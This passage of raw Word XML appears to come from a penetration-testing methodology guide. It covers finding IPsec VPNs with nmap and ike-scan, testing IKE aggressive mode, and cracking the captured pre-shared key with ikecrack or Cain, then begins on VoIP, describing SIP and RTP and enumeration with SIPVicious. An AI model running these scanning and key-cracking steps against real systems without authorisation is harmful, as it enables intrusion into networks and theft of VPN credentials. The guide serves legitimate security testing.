          <w:numId w:val="94"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Aggressive mode - In only three messages, Aggressive mode accomplishes the same overall goal of main mode but in a faster, notably less secure fashion. Aggressive mode does not provide a secure channel to protect authentication information which ultimately exposes it to eavesdropping attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKE Phase 2 IKE Phase 2’s final aim is to establish the IPSec tunnel, which it does with the help of IKE Phase 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identifying IPsec VPNs</w:t>
      </w:r>
      <w:r w:rsidR="00962FA1" w:rsidRPr="00962FA1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="00962FA1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –sU –p 500 &lt;targets&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>port scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRPr="00962FA1" w:rsidRDefault="009C0136" w:rsidP="00962FA1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ike-scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">–M </w:t>
      </w:r>
      <w:r w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;targets&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00962FA1" w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">indentifies </w:t>
      </w:r>
      <w:r w:rsidR="00491F33">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IPsec VPN </w:t>
      </w:r>
      <w:r w:rsidR="00962FA1" w:rsidRPr="00962FA1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0136" w:rsidRDefault="009C0136" w:rsidP="009C0136"/>
    <w:p w:rsidR="005B1DBE" w:rsidRPr="00FE755E" w:rsidRDefault="00491F33" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ike-scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will identify all vpn devices but some may response with notify rather than handshake responses. A handshake means the device is willing to perform IKE negotiation. A notify response means that the device is not willing to negotiate (i.e. it only accepts requests from certain IPs), or we didn’t supply acceptable transforms.</w:t>
      </w:r>
      <w:r w:rsidR="007A3229" w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can try different transforms with ike-scan using the following script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229"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./ike-scan/try-transforms.sh &lt;targets&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00491F33" w:rsidRPr="00FE755E" w:rsidRDefault="00491F33" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Using udp backoff timing analysis ike-scan can also fingerprint device types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962FA1" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229"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shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>ike-scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> -M –showbackoff &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Check if aggressive mode is enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229"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rPr>
        <w:t>ike-scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –A –M &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If aggressive mode is enabled check if is vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ike</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>probe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3229" w:rsidRPr="00FE755E" w:rsidRDefault="007A3229"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ikeprobe.exe &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">With aggressive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mode </w:t>
      </w:r>
      <w:r w:rsidR="007A3229" w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can crack the PSK using Cain or ikecrack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E"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rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -nxq -w logfile.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E" w:rsidP="00FE755E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E"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 xml:space="preserve">./ikecrack-snarf-1.00.pl &lt;target.port&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE755E" w:rsidRPr="00FE755E" w:rsidRDefault="00FE755E" w:rsidP="009C0136">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE755E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cain can also be used but in both cases we need to see client authentication attempts. However, it does not matter is incorrect passwords are used as we are targeting information sent from the server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D5 – VoIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D5a - Enumeration and fingerprinting of devices running VoIP services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005859A6" w:rsidRPr="002E268C" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Voice over IP (VoIP) is a very generic term that is used to describe the transport of voice</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on top of an IP network. A VoIP deployment can range from a very basic setup to enable</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a point-to-point communication between two users to a full carrier-grade infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in order to provide new communication services to customers and end users. Most VoIP</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">solutions rely on multiple protocols, at least one for </w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>signalling</w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one for transport of</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the encoded voice traffic. Currently, the two most common </w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>signalling</w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocols are H.323</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and Session Initiation Protocol (SIP), and their role is to manage call setup, modification,</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and closing.</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>H.323 is actually a suite of protocols defined by the International Telecommunication</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Union (ITU), and the encoding is ASN.1. The deployed base is still larger than SIP, and it</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>was designed to make integration with the public switched telephone network (PSTN)</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>easier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005859A6" w:rsidRPr="002E268C" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005859A6" w:rsidRPr="002E268C" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Real-time Transport Protocol (RTP) transports the encoded voice traffic. The</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>control channel for RTP is provided by the Real-time Control Protocol (RTCP) and</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consists mainly of quality of service (QoS) information (delay, packet loss, jitter, and so</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on). RTP runs on top of UDP, and both the source and destination port may be dynamic (5004/UDP is common). RTP doesn’t handle the QoS, because this needs to be provided</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by the network (packet/frame marking, classification, and queuing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB76CF" w:rsidRPr="002E268C" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>There’s one major difference between traditional voice networks using a PBX and a</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VoIP setup: In the case of VoIP, the RTP stream doesn’t have to cross any voice infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>device, and it is exchanged directly between the endpoints (that is, RTP is phone-to</w:t>
      </w:r>
      <w:r w:rsidR="005B5F6E" w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002E268C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phone).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB76CF" w:rsidRPr="0057323C" w:rsidRDefault="00AB76CF" w:rsidP="00AB76CF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E268C" w:rsidRPr="0057323C" w:rsidRDefault="002E268C" w:rsidP="002E268C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">To enumerate SIP devices use svmap.pl from sipvicious </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E268C" w:rsidRP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svmap.py &lt;target IP range&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6291">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map SIP servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6291" w:rsidRP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svwar.pl &lt;ip address&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
